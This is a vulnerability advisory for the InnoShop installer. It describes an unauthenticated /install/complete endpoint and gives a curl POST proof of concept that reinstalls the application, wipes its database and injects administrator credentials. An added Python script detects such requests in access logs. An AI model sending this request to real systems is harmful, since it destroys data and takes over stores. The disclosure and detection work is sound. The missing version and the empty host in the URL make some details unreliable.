### Vulnerability Overview

**Title**: [Security] Pre-auth Application Reinstall leads to full system takeover #314

**Description**: The installation module (`innopacks/install`) of InnoShop contains a critical pre-authentication vulnerability. After the application is fully installed, the `/install/complete` endpoint remains accessible without any authentication or CSRF protection. An unauthenticated attacker can send a single POST request to overwrite the `.env` file, wipe the entire database (via `migrate:fresh`), and create a new administrator account, thereby achieving complete system takeover.

### Affected Scope

* **Affected Versions**: InnoShop

```php
    // ...
    $this->loadRoutesFrom(__DIR__.'/../routes/web.php');
    $this->loadViewsFrom(__DIR__.'/../resources/views', 'install');
    $this->loadTranslationsFrom(__DIR__.'/../lang', 'install');
}
```

### Exploit Code (POC)

The following `curl` command is sufficient to exploit this vulnerability:

```bash
curl -X POST "http:///install/complete" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "db_type=mysql&db_hostname=DB_HOST&db_port=3306&db_name=DB_NAME&db_username=DB_USER&db_password=DB_PASSWORD"
```

**Expected Result**: An HTTP 200 response containing `{"success": true, ...}`. The attacker can subsequently log in to `/panel` using the injected credentials.
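For triage, the request described above can be hunted for in web server access logs. The following is an added example, not code from the advisory or from InnoShop: it assumes logs in the common/combined log format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed format: ip - user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize_path(target):
    """Drop the query string, percent-decode, and collapse slashes (matches conservatively)."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).rstrip("/") or "/"

def find_reinstall_attempts(lines):
    """Return one finding per POST to /install/complete.

    'succeeded' means the server answered 200, the result the advisory describes.
    'panel_followup' means the same client later requested /panel.
    """
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        path = normalize_path(m["target"])
        if m["method"] == "POST" and path == "/install/complete":
            findings.append({"ip": m["ip"], "time": m["ts"],
                             "succeeded": m["status"] == "200",
                             "panel_followup": False})
        elif path == "/panel" or path.startswith("/panel/"):
            for f in findings:
                if f["ip"] == m["ip"] and f["succeeded"]:
                    f["panel_followup"] = True
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Mar/2025:10:14:59 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2025:10:15:02 +0000] "POST /install/complete HTTP/1.1" 200 57 "-" "curl/8.5.0"',
    '198.51.100.7 - - [12/Mar/2025:10:16:40 +0000] "GET /panel HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [12/Mar/2025:11:02:10 +0000] "POST /install/complete/?x=1 HTTP/1.1" 403 12 "-" "curl/8.5.0"',
    '192.0.2.44 - - [12/Mar/2025:11:02:30 +0000] "GET /panel HTTP/1.1" 302 0 "-" "curl/8.5.0"',
    'this line is not an access log entry',
]

if __name__ == "__main__":
    for finding in find_reinstall_attempts(SAMPLE_LOG):
        print(finding)
```

On an installed instance, any finding with `succeeded` set warrants checking `.env`, the database and the administrator accounts, since those are what the advisory says the request overwrites.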